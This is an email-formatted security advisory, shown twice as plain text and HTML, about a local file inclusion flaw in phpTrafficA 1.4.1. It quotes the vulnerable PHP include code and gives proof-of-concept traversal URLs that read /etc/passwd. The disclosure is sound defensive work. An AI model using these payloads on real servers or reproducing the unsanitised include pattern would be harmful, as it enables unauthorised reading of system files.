------=_Part_16228_26164291.1172086007407
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
phpTrafficA-1.4.1 Local File Inclusion
phpTrafficA is a GPL statistical tool for web traffic analysis, written in
php and mySQL.
It can track access counts to your website, search engines, keywords, and
referrers that lead to you, operating systems, web browsers, visitor
retention, path analysis, and a lot more!
http://soft.zoneo.net/phpTrafficA/
Credit:
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir
Vulnerable Systems:
Version: phpTrafficA-1.4.1
phpTrafficA-1.4beta4
(also tested on phpTrafficA-1.3)
Description:
Input passed to the "file" parameter in "plotStat.php" and "lang" parameter
in "banref.php" is not properly verified, before it is used to include
files.
This can be exploited to include/see arbitrary files from local resources.
read more about file inclusion in http://www.bugtraq.ir/articles
Vulnerable Code :
//phpTrafficA/plotStat.php
//Vulnerable Code :line 14
if (!isset($file) or $file=="") {$file = $_GET['file'];}
include("./Php/phplot.php");
include("./tmp/".$file);
//phpTrafficA/plotStat.php
//Vulnerable Code :line 16
if (!isset($lang) or $lang == "") {
$lang = $_GET["lang"];
if ($lang == "") { $lang = $_POST["lang"];}
}
include ("./Lang/$lang.php");
POC exploit :
The following URL will cause local file inclusion
http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00
# http://www.bugtraq.ir
------=_Part_16228_26164291.1172086007407
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
phpTrafficA-1.4.1 Local File Inclusion
phpTrafficA is a GPL statistical tool for web traffic analysis, written in php and mySQL.
It can track access counts to your website, search engines, keywords, and referrers that lead to you, operating systems, web browsers, visitor retention, path analysis, and a lot more!
http://soft.zoneo.net/phpTrafficA/
Credit:
The information has been provided by Hamid Ebadi
The original article can be found at :
http://www.bugtraq.ir
Vulnerable Systems:
Version: phpTrafficA-1.4.1
phpTrafficA-1.4beta4
(also tested on phpTrafficA-1.3)
Description:
Input passed to the "file" parameter in "
plotStat.php" and "lang" parameter in "banref.php" is not properly verified, before it is used to include files.
This can be exploited to include/see arbitrary files from local resources.
read more about file inclusion in http://www.bugtraq.ir/articles
Vulnerable Code :
//phpTrafficA/plotStat.php
//Vulnerable Code :line 14
if (!isset($file) or $file=="") {$file = $_GET['file'];}
include("./Php/phplot.php");
include("./tmp/".$file);
//phpTrafficA/plotStat.php
//Vulnerable Code :line 16
if (!isset($lang) or $lang == "") {
$lang = $_GET["lang"];
if ($lang == "") { $lang = $_POST["lang"];}
}
include ("./Lang/$lang.php");
POC exploit :
The following URL will cause local file inclusion
http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00
# http://www.bugtraq.ir
------=_Part_16228_26164291.1172086007407--